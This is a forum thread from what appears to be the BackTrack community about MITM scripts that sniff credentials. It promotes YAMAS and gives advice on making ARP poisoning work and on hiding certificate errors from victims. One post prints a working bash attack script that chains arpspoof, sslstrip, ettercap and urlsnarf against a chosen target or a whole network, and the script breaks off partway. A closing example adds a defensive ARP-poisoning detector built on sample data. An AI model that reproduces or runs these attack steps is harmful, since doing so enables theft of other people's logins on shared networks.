
Thread: Script for sniffing traffic.

  1. #1
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Script for sniffing traffic.

    There are a lot of those scripts, hence the name : Yet Another Mitm Automation Script.
    It was originally made for BT4r2 but I "ported" it to BT5, corrected a few bugs and added a few features.

    I can't post the script here without raising some kind of warning due to massive use of certain words for parsing, but please review the source at http://yamas.comax.fr
    You will be able to view the source, download the script and view a demo video.

    It works just great for me, so I hope it will for you too.

    Current main features are :
    - Real-time output of creds without definition files : any credential, from any website should show up, as well as the site it was used on !
    - Log parsing for user-friendly output.
    - DNS spoofing once attack is launched
    - Network mapping for host discovery.
    - Can save dumped passwords to file as well as the whole log file.
    - Support for multiple targets on the network, as well as adding targets after attack is launched.
    - Sslstrip checking (existence, executable, directory, check version, update...)
    - Standalone script, updatable, interactive (new !).

    Please don't hesitate to give me your feedback, I'm always looking for new ideas, and ways to improve it !

    Check http://comax.fr/yamas.php for more info, video, other platform versions and an article about how to protect yourself from it !

    [Current version as of 02/02/2012 : 20120202 ]
    Last edited by comaX; 06-22-2012 at 12:42 AM. Reason: Needed some updates !
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  2. #2
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    10

    Re: Script for sniffing traffic.

    Thanks.
    Have used this before, thanks for porting/updating.

    Is it possible that a modem is immune to ARP poisoning? Since I have this new modem I keep failing at doing a successful attack.
    Do you want to contact me?
    Thanks.

  3. #3
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Re: Script for sniffing traffic.

    Try arp poisoning only one way
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most of your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  4. #4
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    10

    Re: Script for sniffing traffic.

    Quote Originally Posted by sickness View Post
    Try arp poisoning only one way
    Alright thanks, worked.

  5. #5
    Member
    Join Date
    Sep 2010
    Location
    Eastern Island
    Posts
    96

    Re: Script for sniffing traffic.

    oops..... link error.... please review your link.. thank you.

  6. #6
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Re : Re: Script for sniffing traffic.

    Quote Originally Posted by sostentado View Post
    oops..... link error.... please review your link.. thank you.
    Oops, corrected now, thank you !

    EDIT : disregard text in brackets ; I found a way to do that. It's a home-made workaround, but it works !
    [Script-wise, I found a way to loop the parsing process every x seconds (wasn't that hard after all...) and it works just the way I wanted it to, but when I try to pass the function to xterm, it closes immediately. Maybe functions can't be executed in xterm ? That would be logical if xterm doesn't have access to the script*, hence it would not know the function. Any idea ?

    *I mean that xterm is like launching a new console, so the function is not defined for the xterm window. ]


    Bottom line : as attack is running, credentials are displayed as they are sniffed !

    Again, please give your feedback so I can improve it ! Anything really, even grammar.
    Last edited by comaX; 05-15-2011 at 05:46 PM. Reason: a bunch of stuff
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  7. #7
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Re : Re: Script for sniffing traffic.

    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea which website they belong to.
    Any help would be appreciated.

  8. #8
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Re: Re : Re: Script for sniffing traffic.

    Quote Originally Posted by ckcrown View Post
    ComaX.
    This script seems great, but I am having one difficulty. When the usernames and passwords come up I have no idea which website they belong to.
    Any help would be appreciated.
    Yeah, I thought about that, but the parsing is already pretty intense, so I didn't want to make it heavier... And I don't want to use definitions ! This is and will always be a standalone script [*except for that little work-around mentioned earlier ]
    So about those sites, two things :
    1) People generally use the same login/pass pretty much everywhere, so the site it was sniffed from shouldn't be much of a problem.
    2) If you really want the site it was sniffed from, you can save the log at the end and search through it, it should be pretty fast since you know both login and pass.

    If you have an idea for parsing sites at the same time as the rest, without being too much of a job, I'm all ears !

    On another note : Sslstrip 0.9 is out and seems less buggy than 0.8. There is now an option to update sslstrip, if it is installed only. There will shortly be an option to install it, and/or update it.
    Last edited by comaX; 05-21-2011 at 04:15 PM.
    Running both KDE and GNOME BT5 flawlessly. Thank you !

  9. #9
    Just burned his ISO
    Join Date
    May 2011
    Location
    Athens, OH
    Posts
    12

    Re: Re : Re: Script for sniffing traffic.

    ComaX,
    I ran across a script a while back called Sniff.SH and it worked fairly well for Backtrack 4 (doesn't work for me now though) and it utilized Ettercap and, well, I had many complaints about the script, but in the Ettercap Xterm that pops up you were able to see the website and login and pass. I will attach the script. Also maybe you could combine URL Snarf and see if that fixes it?

    Code:
    #!/bin/bash
    
    # Script for sniffing https connections.
    # Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
    # Tested on BT4 R2
    # BY gHero,cseven,spudgunman.
    # Ver 0.2
    
    # ASCII sniff.sh
    echo '
                  .__  _____  _____           .__
      ______ ____ |__|/ ____\/ ____\     _____|  |__
     /  ___//    \|  \   __\\   __\     /  ___/  |  \
     \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
    /____  >___|  /__||__|   |__|    /\/____  >___|  /
         \/     \/                   \/     \/     \/
    '
    
    echo '1' > /proc/sys/net/ipv4/ip_forward
    
    iptables --flush
    sleep 1
    
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    
    # Arpspoof
    echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
    read ARPOP
    
    if [ "$ARPOP" == "T" ] ; then
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
    read IP1
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &
    
    else
    
    echo
    echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
    echo '------------------------'
    echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
    read IP2
    
    echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
    read INT
    xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &
    
    fi
    
    # SSLSTRIP
    xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &
    
    # ETTERCAP
    xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &
    
    # URLSNARF
    xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &
    
    # DRIFTNET
    Last edited by sickness; 05-21-2011 at 07:34 AM.

  10. #10
    Just burned his ISO
    Join Date
    May 2011
    Posts
    15

    Re: Re : Re: Script for sniffing traffic.

    My vote is for an option to install the updated sslstrip. One of the reasons I like the idea of this script is that it's very helpful for beginners, like me, who aren't very familiar with the console commands needed to do something like this. I could, and will figure it out by searching these forums, of course.

    Edit:

    Could sslstrip be launched before arpspoof in the script? I realize it doesn't take long to enter the filename for sslstrip after arpspoof is started, but this does leave a small window where traffic is being redirected but not stripped of SSL. The target may get a certificate error in that brief period of time. The same applies to the cleanup, stop the arpspoof before stopping sslstrip.

    Also in the cleanup does the "killall arpspoof" do a clean shutdown of arpspoof? When you ctrl+c the process arpspoof sends a few more arps correcting the gateway MAC so that the target doesn't lose the ability to talk to the gateway after your system is taken out of the middle.
    Last edited by sickness; 05-21-2011 at 07:35 AM. Reason: Merged posts.
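
Seen from a host on the affected network, the ARP poisoning discussed in this thread leaves a trace in the neighbour cache: the gateway's IP resolves to a MAC that differs from its known one and that another IP also uses. The check below is an added example, not part of any post or script in the thread; the cache lines are constructed samples in the format of `ip neigh show`, and the function names and addresses are assumptions.

```shell
#!/bin/sh
# Added example: look for signs of ARP cache poisoning in `ip neigh show` output.

# find_shared_macs: read neighbour-cache lines on stdin and print every MAC
# address that is bound to more than one IPv4 address ("mac -> ip ip ...").
find_shared_macs() {
    awk '
        { mac = ""; for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i+1)) }
        mac != "" && $1 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {
            if (!seen[mac SUBSEP $1]++) { n[mac]++; ips[mac] = ips[mac] " " $1 }
        }
        END { for (m in n) if (n[m] > 1) print m " ->" ips[m] }
    ' | sort
}

# gateway_mac_changed BASELINE_MAC GATEWAY_IP: succeed (exit 0) when the cache
# on stdin maps the gateway IP to a MAC other than the recorded baseline.
gateway_mac_changed() {
    awk -v want="$(printf %s "$1" | tr 'A-Z' 'a-z')" -v gw="$2" '
        $1 == gw { for (i = 1; i < NF; i++) if ($i == "lladdr" && tolower($(i+1)) != want) bad = 1 }
        END { exit (bad ? 0 : 1) }
    '
}

# Constructed sample data (not captured from a real network).
GATEWAY_IP='192.168.1.1'
GATEWAY_BASELINE_MAC='00:11:22:33:44:55'
CLEAN_CACHE='192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.66 dev eth0 lladdr 02:00:00:00:00:66 STALE'
POISONED_CACHE='192.168.1.1 dev eth0 lladdr 02:00:00:00:00:66 REACHABLE
192.168.1.66 dev eth0 lladdr 02:00:00:00:00:66 STALE
192.168.1.20 dev eth0 FAILED'

# Demo run over the poisoned sample.
printf '%s\n' "$POISONED_CACHE" | find_shared_macs
if printf '%s\n' "$POISONED_CACHE" | gateway_mac_changed "$GATEWAY_BASELINE_MAC" "$GATEWAY_IP"; then
    echo "ALERT: gateway $GATEWAY_IP no longer resolves to $GATEWAY_BASELINE_MAC"
fi
```

A router that legitimately holds several addresses on one interface also shows up as a shared MAC, so the baseline comparison is the stronger of the two signals.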
